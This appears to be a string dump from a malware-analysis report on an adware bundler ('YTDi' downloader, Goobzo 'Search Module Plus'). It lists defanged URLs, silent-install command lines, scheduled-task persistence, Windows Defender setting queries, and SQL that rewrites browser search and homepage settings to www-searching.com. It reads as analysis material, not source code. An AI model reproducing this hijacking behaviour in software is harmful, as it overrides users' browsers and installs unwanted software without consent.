SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

%ddd

SB_TASK_%d

CreateTask: Query IExecAction failed

RUNONCE_%d

PT%dS

d-d-dTd:d:d

PT%dH

; UnelevateExecutable: Initialize failed

UNELEVATE_%d

; UnelevateExecutable: CreateTask failed

; UnelevateExecutable: RegisterOnceTask failed

; UnelevateExecutable: Task is still not running after 30 seconds. Task state = %d

%d.%d.%d.%d

Windows NT 6.1

Install.log

@REGKEY

.ReturnCode

cr.exe

%%SBDATE%%

%%SID%%

%%SUB%%

%%FULL_SUB%%

GetXml - Magnet is empty: %s

&ver=%s&are=%s&qre=%s&avre=%s&kbd=%s&tz=%s&pp=%s

GetFile - Failed to connect (Err=%d): %s

GetFile - Failed to connect: %s

GetFile - Get Failed (Err=%d): %s

GetFile - Get Failed: %s

GetFile - Read data Failed (Err=%d): %s

GetFile - Read data failed: %s

Failed to create process file (%x).

Mtx%d

Windows NT 5.1

Windows NT 6.2

Windows NT 6.0

Windows NT 5.0

?prd=%s&aff=%s&ver=%s&rnd=%d&tss=%d&action=%s&actionparam=%s&usid=%s

/p.ashx

Sock_Ping : getaddrinfo error = %d

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko; SBUA) Chrome/28.0.1500.95 Safari/537.36

GET %s HTTP/1.1

Host: %s

User-Agent: %s

close failed with error: %d

/S /PING /Action=%s /ActionParams=%s /PingParams=%s

/S /MAG=%s /INSTALL /dir=%s /products=%s /pixGuid=%s /sub=%s

ScheduleDownload Initialize Failed: %s

ScheduleDownload CreateTask Failed: %s

Start time: %s. End time: %s.

ScheduleDownload RegisterDailyTask Failed: %s

ScheduleInstaller Initialize Failed: %s

ScheduleInstaller CreateTask Failed: %s

ScheduleInstaller RegisterDailyTask Failed: %s

DeleteScheduleDownload Initialize Failed: %s

DeleteScheduleDownload DeleteTask Failed: %s

\Installer\Install%s_%ld

ShellExecute:

Second shellExecute:

RunAsAdmin failed : shell execute failed

HKEY_LOCAL_MACHINE64

Windows Vista

Windows Server 2008

Windows 7

Windows 8

Windows Server 2008 R2

Web Server Edition

Windows Server 2003 R2,

Windows Storage Server 2003

Windows Home Server

Windows XP Professional x64 Edition

Windows Server 2003,

Web Edition

Windows XP

Windows 2000

(build %d)

FWCMD

GetTimeZoneInformation failed error %d

CInstallerUtils::AccessRegistryKeyValue64Bit Error opening key

CInstallerUtils::AccessRegistryKeyValue64Bit Could not read registry value

SOFTWARE\Microsoft\Windows NT\CurrentVersion

d/d/%d d:d

%d seconds

SUCCESSKEY

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE

REPORT

TSMtx%d

%s /SECONDSTAGE /Mutex=%s /PIXGUID=%s

Error creating shared memory. Err=%d

Error running file: %s

Timeout expired (%d)

Error opening mutex. Err=%d

Return code = %d

Error reading return code. Err=%d

dfb5uyoqjsg4c.cloudfront.net

d1cfk8e4o0c4u2.cloudfront.net

d1vw44q53d84jx.cloudfront.net

Kernel32.dll

Error %d

ACUrl:

ProxyUrl:

ProxyBypass:

Bkernel32.dll

HKEY_USERS

HKEY_CLASSES_ROOT

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

BRWURLS

CInstallMgr::Work, exception: %s

KEYBOARD

XML is incorrect. Xml size=%d. Xml= %s

XML is incorrect. Xml size=%d. Plain Xml= %s

XML %s

bxsdk32.dll

Failed to download bxsdk dll. Error=%d

MINVERURL

REPORT_PROG

/S /REPORT /NUM=%d /AFF=%s

PINGURL

Incorrect xml - No products Node. Xml size=%d

ALTURL

REGKEY

AFFREGKEY

OCSetupHlp.dll

OC_KEY

IMAGE_URL

Cur ver %s, min ver %s

/ENC /S /MAG=%s /INSTALL /dir=%s /products=%s /pixGuid=%s /sub=%s

%d of 1

%d of %d

CInstallMgr::ReportSize

Schedule report failed

SOFTWARE\Microsoft\Windows Defender\Real-Time Protection

SOFTWARE\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction

SOFTWARE\Microsoft\Windows Defender\Signature Updates

SignatureVersion: %s ; RealTimeDisabled %d DownloadDisabled %d RunningDisabled %d ; DefActionSevere %d DefActionHigh %d DefActionMedium %d DefActionLow %d

OpenCandy init failed. Error=%d. Dll path=%s

Failed to download OpenCandy dll. Error=%d

Waited %d seconds

%%successProd%%

%úiledProd%%

Install %s

Set and keep www-searching.com my default search and homepage

By clicking Install, you agree to the <a href="hXXp://VVV.ytdownloader.com/legal/privacy/">Privacy Policy</a> and <a href="hXXp://VVV.ytdownloader.com/legal/terms/">Terms of Service</a>

Link %s

Client for product key 1 loaded.

Client for product key 2 loaded.

Recommended by %s

<a href="%s" id="TOS %s">Terms of Service</a>

<a href="%s" id="Privacy %s">Privacy Policy</a>

Offer %d: Title: %s; Description: %s

Offer %d, Result %d

Exception CHttpDownload::GetNextRange for URL %s

CHttpDownload::Open handle %d to file %s

Failed to open file %s, error = %d

__ERROR CHttpDownload::Read failed for file %s

CHttpDownload::Repot Bytes %I64d ,Total %I64d, by Downloader %d

Range=%I64d RangeReadBytes=%I64d connection %d Error %x

RedownloadRange %s err = %d headers=%s

CHttpDownload::RedownloadRange for URL %s

%sid=%d_r=%lld_err=%d

CHttpDownload::ReportError for URL %s

CHttpDownload::GetNextRange for URL %s

Get Failed : connection %d err %s (0x%X)

CHttpDownload::DownloadNextRange for URL %s

CHttpDownload::Close handle %d to file %s

CHttpDownload::NOT Close handle %d to file %s

CHttpDownload::Work for URL %s

PRESUCCESSKEY

DOWNLOAD START: %s

Download in virtual mode product: %s

Download Failed to createCHttpDownload:

Download Failed to createCHttpDownload: %s

Download - Failed to connect: %s

Download - Get Failed: %s

Http Reply code = %d

Download Failed to create downloaders list: %s

CProductInstaller::Get for product: %s, exception: %s

CProductInstaller::GetNextRange - No Next Range for product %s

CProductInstaller::GetNextRange - product %s start=%I64d end=%I64d size=%I64d

CProductInstaller::Close for Product %s

DownloadMultiConnection:file %s exists on disk %s

DownloadOneConnection FromScheduler : %s

DownloadOneConnection FromScheduler will download: %s, file DOES NOT exist on disk %s

Get failed (DownloadOneConnection): err=%s (0x%X)

Success %s FileSize= %I64d

DownloadMultiConnection FromScheduler : %s

DownloadMultiConnection FromScheduler will download: %s, file DOES NOT exist on disk %s

Get failed (DownloadMultiConnection): err=%s (0x%X)

INSTALL START: %s

/aff=%s /rnd=%d

/rnd=%d

CProductInstaller::InstallProduct for Product %s

DOWNLOAD BYTES: %s NumOfBytes = %I64d

DOWNLOAD NOT COMPLETED: %s

Trying One Connection Fallback: %s

Download failed, error (%x), %s - Trying Multiple Connection Fallback

RunFromScheduler: Trying Main Connection Fallback: %s

Trying main URL in one Connection %s %s

Trying Alternative Connection Fallback: %s

Alternative Connection %s %s

Alternative Connection Failed: %s

Download failed, error (%x), %s %s

Download failed, error (%x), %s

CProductInstaller::OnDownloadNotCompleted for Product %s

OnDownloadCompleted: %s, exiting status %d

status %d, id %d, total bytes %I64d, file size %I64d, %s

DOWNLOAD END: %s %s

%s, %d

DOWNLOAD END: Not all completed %s

%s FileSize= %I64d

CProductInstaller::OnDownloadCompleted for Product %s

INSTALL BEGIN: %s

INSTALL END: %s

CProductInstaller::OnInstallCompleted for Product %s

Install failed, error: %s

%s: %s

CProductInstaller::OnInstallNotCompleted for Product %s

%s - %s

SkipInstall - %s

/S /SCHEDULE /MAG=%s /pn=%s /pixGuid=%s /sub=%s /Reason=%s

CProductInstaller::AddToScheduler for Product %s

CProductInstaller::RemoveFromScheduler for Product %s

RESUCCESSKEY

%s:%s

UI screen timeout - %s

CRandomCondition::IsToInstall value = %s

CRandomCondition::IsToInstall mode result = %d

%d:%d

CRandomCondition::IsToInstall Return %d

CCMDLINE

YTDi 1.0.0.1

1.0.0.1

CrashRpt YTDi 1.0.0.1 Error Report

/INSTALL /dir=%s /products=%s

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

WAdvapi32.dll

By clicking Next, you agree to install %s and agree to the <a id="TOS" href="%s">Terms of Service</a> and <a id="Privacy" href="%s">Privacy Policy</a>.

%s:%s;

RICHED20.DLL

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Content-Type: multipart/form-data; boundary=%s

HTTP/1.1

XXX

Content-Disposition: form-data; name="%s"

HTTP/1.0

Software\Microsoft\Windows\CurrentVersion\Internet Settings

D%sLow\%s\

%s\%s\%s\

%C:\Users\Public\Documents\%s\%s\

%s\Application Data\%s\%s\

[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s

[SbTracer::ReadConfiguration] Trace Level: %d

[SbTracer::ReadConfiguration] Trace Destination: %d

[SbTracer::ReadConfiguration] Trace Backup: %d

[SbTracer::ReadConfiguration] Trace Time Limit: %d

[SbTracer::ReadConfiguration] Trace Time Stamp: %d

[SbTracer::ReadConfiguration] Trace Max Size: %d

[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s

[SbTracer::FormatFilePath] ___Warning - No Log folder: %s

[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s

[SbTracer::FormatFilePath] Log Path: %s

[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s

[SbTracer::RecursiveCreateDirectory] Directory: %s

[SbTracer::OpenTraceFile] ___Error: %d, File: %s

[SbTracer::OpenTraceFile] Done %s

[SbTracer::BackupTraceFile] %s

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue

\StringFileInfo\x\%s

<d/d/%d d:d:d::d 0x%X>

the %s <a href="%s">Terms</a> and <a href="%s">Privacy Policy</a>

@%s?e=%s

zvl=%s&

File open error %d. File=%s

File size is 0. File=%s

Buffer allocation error %d

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}

c:\%original file name%.exe

2.7.0.999

ins_smk.exe_472:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

unpacking data: %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|<>/":

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv3.tmp\nsExec.dll

SMUninstall.exe

rObject.dll

, /urlset=searching /remote

9-9999-4d88-b7ee-c966777ccc70, /urlset=searching /remote

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv3.tmp\nsExec.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv3.tmp

on\App Paths\smu.exe

-b7ee-c966777ccc70, /urlset=searching /remote

hXXp://VVV.usertrust.com1

1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl0t

1hXXp://crt.usertrust.com/UTNAddTrustObject_CA.crt0%

hXXp://ocsp.usertrust.com0

hXXps://secure.comodo.net/CPS0A

0hXXp://crl.comodoca.com/COMODOCodeSigningCA2.crl0r

0hXXp://crt.comodoca.com/COMODOCodeSigningCA2.crt0$

hXXp://ocsp.comodoca.com0

1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05

.reloc

SShL0

PeekNamedPipe

CreatePipe

nsExec.dll

:":2:7:@:

`.rsrc

@.reloc

lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet

v2.0.50727

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw4.tmp

nsw4.tmp

datePlus\smu.exe" /install /pin:1 "/s:F5GzSMTDK0,99999999-9999-4d88-b7ee-c966777ccc70," "/is:1" "/it:1" "/ih:1" "/ei:1" "/ci:1" "/fi:1" "/oi:1" "/urlset:searching""

/db=all /is=1 /ih=1 /sparam=F5GzSMTDK0,99999999-9999-4d88-b7ee-c966777ccc70, /urlset=searching /remote

0,99999999-9999-4d88-b7ee-c966777ccc70,

mk.exe /S /db=all /is=1 /ih=1 /sparam=F5GzSMTDK0,99999999-9999-4d88-b7ee-c966777ccc70, /urlset=searching /remote

=F5GzSMTDK0,99999999-9999-4d88-b7ee-c966777ccc70, /urlset=searching /remote

99-9999-4d88-b7ee-c966777ccc70,

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Install_31932\ins_smk.exe /S /db=all /is=1 /ih=1 /sparam=F5GzSMTDK0,99999999-9999-4d88-b7ee-c966777ccc70, /urlset=searching /remote

%Program Files%\Common Files\Goobzo\GBUpdatePlus

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Install_31932

ins_smk.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Install_31932\ins_smk.exe

Software\Microsoft\Windows\CurrentVersion\Uninstall\Search Module Plus

/S /db=all /is=1 /ih=1 /sparam=F5GzSMTDK0,99999999-9999-4d88-b7ee-c966777ccc70, /urlset=searching /remote

530736650

F5GzSMTDK0,99999999-9999-4d88-b7ee-c966777ccc70,

smei32.dll

smei64.dll

)-.Yln

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b0</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>

2.1.9.476

smw.exe

ins_smk.exe_472_rwx_10004000_00001000:

callback%d

ns5.tmp_1504:

.text

`.rdata

@.data

.reloc

SShL0

PeekNamedPipe

CreatePipe

KERNEL32.dll

USER32.dll

ADVAPI32.dll

nsExec.dll

:":2:7:@:

smu.exe_1632:

.text

`.rdata

@.data

.rsrc

@.reloc

FTPj

E@PSSh

 1 23 456

Jx.SHx

.TxK%Yx

208.69.150.250

208.69.150.252

8.8.8.8

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\

Catcher.ProcessId:

Catcher.Path:

Watcher.Filter:

2.1.9.476

smu.exe

Chrome

Report.xml

/Url:

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

3.7.2

SQLite format 3

CREATE TABLE sqlite_master(

sql text

CREATE TEMP TABLE sqlite_temp_master(

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYo

inflate 1.2.3 Copyright 1995-2005 Mark Adler

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

1.2.3

?456789:;<=

!"#$%&'()* ,-./0123

Report factory:

Update.xml

URLSet

Report

homeURL

suggestURL

newTabURL

ieSearchURL

chSearchURL

ffSearchURL

opSearchURL

chromeKeyword

[UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]

vup.tmp

Argument.CheckResult:

Argument.IsRunning:

Delivery of report succeeded. TaskId:

Delivery of report failed.

&#xX;

</%s>

%s="%s"

%s='%s'

<!--%s-->

<![CDATA[%s]]>

version="%s"

encoding="%s"

standalone="%s"

SHDeleteKeyW

RegDeleteKeyExA

RegDeleteKeyExW

NtQueryKey

1.3.6.1.4.1.311.2.1.12

Snapshot.xml

GoogleChrome

MozillaFirefox

AboutTabsUrl

HomePageUrl

DefaultProviderKeyword

UrlsToRestoreOnStartup

StartupHomepageUrl

Chrome propagate flags:

Firefox propagate flags:

ParentKey:

GvrV5 fIBwR5G1CQDyLsic/pOLfRYKAGRyMxV8NxzSLudH5dYJ7ItKYE7rC1AC99X2kzxEChSNvkXetV0jCmjqUjmvO10UOWty3ApOQucR/hia9cu3H02a 5R CG5qhR8Y/uzTzzCr4GfPZ8D8t88yUqyCjdTSd8VRzWUuml0XIRmAC3mIaIBnS0qtpU54eeMa P511PX57TteCBWpQr UysHS8QouOBFyhBBaanipF1PUZ8zItL9IeCtaFExJDKcxi7FU7dmU7ctk7EMZZR3AC3j7jgcRnxrBRdeCW5PDYDKjcHmxPGAZm ePsRg6dCH9XvAsXiSqWsGTuCaJydkQ6BC6sdjbBYCQUNu0nP10JlSn5NzpucbmEgVB1WLSsSDe9vYbtKTOOJRR/CGu7qSqmZ1YxAdjnPMshzg FPfycjHdyERU/SZHvERWXU9WjRnocOXQbT0XOzcBQYfdCa3hiBDgamllsamooTTof6lK6Zb2EYpLiqRQU8WOQCSQu3D2YDP5v9J1Ah7R5gFH4pWrujpklOckba/Bhit29bHcRVAi6mCX5DamNCUq4tY5YMLWVOyVlPLgnZ2 AoHHhCVzsJqNqYZAEseYuauz5gxxhiozc82QCxEJsH2wDGV4Fnf8fmimJyQybsVBebTkkGhRnXfu0YEB4r2oBX3lttd09zG gE2dSUZsHBBBRwvxpM1HoEdvDeLKIaszMpTdRi5i9Rjlxfi9Gpe0mMgvRgepguez9/DfrgUpCVpjnmdNa5TuEirTy3 3mUWdojeY6y8tNBJLsyaj2cmjca3wiE/pLENTnow dbju2fmW9Odso8GLznFwJ6v7o aa2XPOVqX1qryZzbVRaYkdUtOZwrz3FBq1reAfrk12qBENZPPGH8qFcC1Xta09MnkMdxGwD1VeVH6y1RoVkpTPp8mumzKWoXv9DMFPLowiUNgpG22Ss2Vl3szBKCiwYupVQT1GMO/8/psE5WgwQjj9GkHyf3qsI7DSk3d1tp6LFKIdpFPw1fKx72Xwkee0n1T14ksSGewLuCI5WBuOqSexXFXKxmwFhXlCqivfRWSmIJP3ILQrfZbdILbXlwYfOJaoFIMMzCvlMq1hNa/26crmnuBXd8PAHYi5oF Ezzi28v/GmzOTan5Inj1p29ta/WyOajmdLkVPj/Ff/85EnaiNPV62/inI0Y G cikLBu94xgMNywTIn0iSo0A2A5zcNR0/W3DEqGCgbVHqqqN7oxy08Qx5h2gnrOB oSz4TfhJ72enIju7sYLTxMA7kHQzi1uY89QwqJ0lVbA0qUWOVGk3mHyuDH6s6ZsaVE21RT7iGvRc QmQG7X0EwDW3iK5YkiyDUwVzhYEGWfcbv2oR3qOQQDzTqwWYUeFmo0zKzQ86B08jN52EcuOE/ZCkLYCStfmrxhGiipXWbEWtFa973DaRy3KrobC50pz6S4AQ Xu9RlrutYMXGmRg/8hI08I4xW5uWRoMqVCLBcPq478k/Ez1Iuvw3JZBa5n3BHwmUosLcnRRpHWRptiZlKMNviUquLgwrIMhacWmDWX6DGjZz72knZzg3qzYwKatnnRjfEtXRrxXq5dKWE8P/XvlVCstT/qYqNm964Oc46C0p/j6M59qVRvkUnAZuZKVVXVc04fSy4FjvJzrD5LfXxpYA7lBFQ60fZYVir 54eC83A5L9BfivvGlwewWfWS5racrcSmF5nYMxn3f8EjwkuZK91BRZlAPdRAg1gfb2ohlntdntu/8x6g1Fph870zNk13u7LFWihV1csZZqZaKcf8uHi wLKouWpmT1vhCNR07YaH6glQvRnt556rVJvZWmKsVI D11NhFxQLUCKde TCvcZ9s8s2wVPTRW5ahtdYOUnZTFvHHm6WxjtFCc nNYa9LXYdoHnqQQbbKdnkYE3sY0r1cUZAZcLNGx7JjJlAz wLhxfvJ5Se6MsCoFx4tMQppa5N4IrcPL90Nqa0IehVmEvHvCsO96nwiOiJpFF5Rng8RAqrvnP7fJBgG grlD9sfim7R2LOvb8LIeDb/HkDwIOy0Ypq2WpWoj2sTSzv4LQeLmJnKqL8dPxNApEeCe/on90DLRH/7K2BOfAj4xNnkG8Wurgv8Aq205ha0rLU9c3fMu9qrSi/Lbh E5HwYMA/tzBwF6ZXR99yS0gt mz6yNCN8w9wK3 0cO6uoanOjzCCxkuXpkyIU5hIi4/aW0TS2NlDFlvgPs37FyXA3rM0rHHeEds6 N2YImzYWB45i3GqILHKLBnTYfsLAUMKSLqWFcSqlD2EAOJbgUN2dhhIZd8JSqHyltvUyR8fGRbT8H1C6lFlFw6TCxTjkY7hSGOB6CqzEs33tkr55PJUiBsU lrpTQX7T29psodMnih9sC97Wb6zIFJyIfIoxaxbcC411rqyJV WlRazWlP9dmcgd2KEqEuh HIGycoc6a74vp4I1eVo4j1DXtAbXnHEj/Nzk4NsFusbI9x9r8yoJGsAjKACoQqPoqgY6Nh6OgOPbqO0KcFE6RykrPzFDk087OfMz9xiaFrZcW9VdEoOGStbeIbQ61UbyXpHDkUpxIwy4WM6Q9jKdPcTJ3aBz3FCcdefxnGRHHeQ/TqrwU4zZ7WYikjCOoz6MLXTYdCCnrllA//dUk4rwM1HWaGHEMhUdSy8hKAd5bLH9JrVLB06axRgBYkgEfMAtdk/nTZwNFANA3xxxsjmlKtAzYNMpGhR5Jt2gs wEJKr3LF4mYqDxTmRdmxZzTSVlyupVv4c9WZc 5yFM63XebcscL6A4Vnd3tBpJCwY7BQj/INn 6L4DYFeEPAk3u56A6Idj9m5n3G8ElGy2ioOO5NLlT2BbQaf ydP 9doEgUl5I8vsvV3drtRmh8NlZTBnor4rhMg/5817TDiQOHVX/6ICKz8QAQ1qXh7rzHRgxv7l4hHdXC4BGHwimaD0vYdupfNiXOzJcR9Zi2FrL85kXZm/pKyAcUuT4mzwjvKHO8APVYBS3WPir7VT2GFuHIUk1jJdNzKYgPjW22pzqdWXzPCSwjqDtq1qci7tqa/iOikTtCsTOpe AtNDxBDyzbGRaGFRyDRmXf33o2wcd//5IkfU7zQDa8WdYYUqsJynEUW42wWLV2nfjyqvreKblZDfYXn7THCHpV FJqIA6QA3pVD/Iu4KCRWdwZhmGMf5115QF0A6wrHoiZr/C/c/ZzCzFd9AGd0/X/RXx5kAb/zSif FfHcxHpQ1pq956dBZ1KjZrY9PyxZF/uA8rHRCmaSGD4KhAwxA/T36fiLBJIvl YXdITmqH9g nng7f45Zi7UUvzZxHqetki8rZ VsWB0xM9f7cSEmyvDEqfhNKYT P/d8P9NRwv9pUx8RxruqBWYeyfeSKjB j97YTQCVG7lhvWt9SPacgGMHYQuR8YiGg3n/fKOacQ7XY7aXdMHYubFWgoTODW1TvMnTvo9KyKdcPRIZQLlODCSK2cA1/R AIojRwIFEU3gXLsC9CzL9TEeGdDnmnpTjRR/oc4fnDwiFdwh1sts7dbUU/MKxC0vIxSqTJ Bm5RJuCOUcCIOEALJ suBTJvj4EmrcgctR6ryJKkGlDzGLrLWgyK0pY776i MXQ6AA3wbM3ZQi75onR2vwCjgg8UQv5DMcP6HUM17MXCEHdbIEUvhJAKDZ6LGKfkP96HQrEgqjjsj97SZh YcQTzaR0M7JY3K3RwE/Oqv8BkWJMrOL1Mnhg vKtsNcwhtpUsBwrBgu3JrXbI/x0dho12ZuysjpUNiI7l8TVGCz00XXU0TNrucXvRe0z35rEpiTe9S/xdMqSDXmdGPz0VAHnfSf7GAckWfA3cfc6 fK3empP1a92e LLSpLJ eMrocYgVIvvo3sTpDaXWjQTa02srQEfZ9IFEOoEy3hYk1SzsXYanCd2UpHfsIHUn7A6Q5RL6kWAZXZjwXvcyDAd/iE/QmFFsENOkaEHNg5OVQeNkq6yEZdfdzPkkTSoD4ztUHEJpeNg66Z9bb085oS J3S42RvycdQGnk5Oi5IEzP24pIdF j3sKq17UXVbyMFHV8lOjWSlh1Y0Kq937bvGCBsnRwVwsXGaLrE0r4tLCj m5AR2mFP4JZKENROWGtv3BprlrMyW6uvd5XSKuyvDiHUpXC6X9vrBPdjhmY u1Ix3RLWWPyTlPNW9REKmk L6jtTqOdXQBBY6llXsDP GxJn/t1uTRSFktjf19T8K50owKGTnlhpUoqBt9WVKYR6YyGit8Mk9OX/kVR75EdE/t/VVSU/iQ4d3nFk75apgn3VoMIbDYB0MU7nPdwWV4Bw3vs2RpHTpOtd1ALNwE2rqG4GkKoTSlO7r7pf/7JUPLCEJ3MTmW ertKdGAF44MJoB5oJUC7cRpKE1GGYau4eKBe29fIMqabrVr6QSkkptljw8q6a9b0s51CNzKlcCEcnJ7cb8LzsVCoGFhsnLlYPtWEiZHnck3lMYWn 3dXBSbWlR5w4LH5uACO4/rhbVUD4ucX8Q3I xuwLg6D9pwjadqdcdeihP/dYMvbQkdRk/tNAX0NaFWMR/HAAIfPoqp/1rr1gRVssVKEiGD5sEAwe6oTJDXp53arWV3D/D5vn5IujBQ 2rnEYYUHXiy8l1JERR4rjNA7DT12jpOMT0jMd3iVIUBUj1mzjGZXIzrf1f/a31pbSCu 0xzo QvEihKjVfvV3OARI6o/U01YFNMB9PVBsYErGfiDd63JVmt3N8qLiFu9vjgbuR8v1Rqn6xhFt/268gxSnx6tR6RFkFakyk6xOIaoJqswSm7afKhThe55zMkJ1PXHaus/uKqhRKSx4PeLqR FvkdLVc1JiARy7RTdtBf4Bb2EFW11 XM3gU54DShNFXlldANcdZN6m/SO8vvJk2D45MvLWXyNVpppvdKfZ8gxSFna86neYQQ5MDbA2ybUl7PMmpMhipbx4u11sXUrkPb1krAEmlZe8b0NidLcTj9VOBgLD1OGyOnG 6iwNfShAh8UxAiZdQsOW7WkEAhvQWcu8F7zEZv1/RgOnyZj8h3NoufhlpqLWpBDf1Yn2TzN3mCKZZVtLWxoUGYN5hKFOHNw wFzSF/NcvveWIPceTitVXSx5V6KEMOmO9a8dbLLGj7wxi CD8aPNkL axxoWufJlAgNxC5vXoEVAtplK0CHRgJ/wFPHmREGEF7NKP9A1ATHTHzs97I04evT1dSc49oXK9XKbkx4nNsdwgeSdyWVKCABqAz9kVRVIom17pjwW8hc2JMJMhfEYUhDTenPgRu39cVRdPbHRBv9RULbqFimTLA6Ty1z2vN d RyOelC1Br/KCR1gs3 82Cpw9ANMYOUJSuSRxU/0yUKmboVum8icoM 1NpWi o wNKF/mtSGBg2O7QHI1qiCaEFr4JJ1dCTCibfvDUMgTIY4O6BS09dnfU66wIflATHfn3Vmz2O50icTeJCWKS1jbawYcRi18oLSBwmpPDXEo2PN7yZL9HUZF1QouUtVmHVEdUE4rQByTqa1MVsX86qDqtUnory9jONYV/vH7d4ez2KHSdPTt9xp3DAUH6A6dfyDIuV/9p42DDcXnW76lM3U/CsGM D9wFWiE46fRg5YU7GaujJWF04ZND7q gtbYPtbQ5 c5GicyYhXm7 JEE0t2 umb1A3XkLpWHPgOskn6nDRqT8pogSUQIwAhh71cUWkOGDMbcf JXOSMxXP9kIlF0Hl83ZsuwOnCxDcq7fa7o4mw/XZQgWJ7s4hA8s3/oev6/GtZX1KRw0qxgWbFSByNpU9rJc7akt9ZTVy19DUC2bVf/S7 mDmdLTLXknZuoeYWL /Yu/KMHimnmPc3VbRijG9yMq346J4Uzg qdOxn2P9sq2/IGUhNgRHnYhWUtJpyCaS7J8aQXHlRip23vRRFZdpWvqMNS9BWHDk1ISh5GUkediSGfX6oTEL2qol6OQQa4sXuy2Ei75O6Mdxd8rEdObV9Nr8FAW0IXJI93aPpDKjCx12PbNKFWnWXhtfxNKNQd9uTCY=

2, 1, 9, 476

Envelop.xml

Configuration.xml

UrlSet

Opera

StartPageUrl

AboutTabUrl

SearchScopeUrl

SearchScopeIconUrl

SearchScopeSuggestUrl

DefaultProviderSearchUrl

DefaultProviderIconUrl

DefaultProviderSuggestUrl

SearchPluginUrl

SearchPluginSuggestionUrl

TabPageUrl

SearchEngineFaviconUrl

SearchEngineSuggestionUrl

SearchEngineSearchUrl

SearchEngineKeyword

System.xml

Reset-2.1.0.7

UpdateUrl

ReportUrl

ReportDlls

User.xml

urls

SELECT * FROM urls

ERROR: %s

WebData path:

Argument.GeneralConfig:

Argument.Snapshot:

Argument.Flags:

suggest_url

originating_url

favicon_url

keyword

keyword LIKE '

keywords

WHERE key = 'Default Search Provider ID'

key = 'Default Search Provider ID'

DELETE from keywords WHERE id =

search_url

icon_url

startup_urls

urls_to_restore_on_startup

chrome_url_overrides

template_url_data

www-searching.com

image_url_post_params

instant_url

instant_url_post_params

new_tab_url

search_terms_replacement_key

search_url_post_params

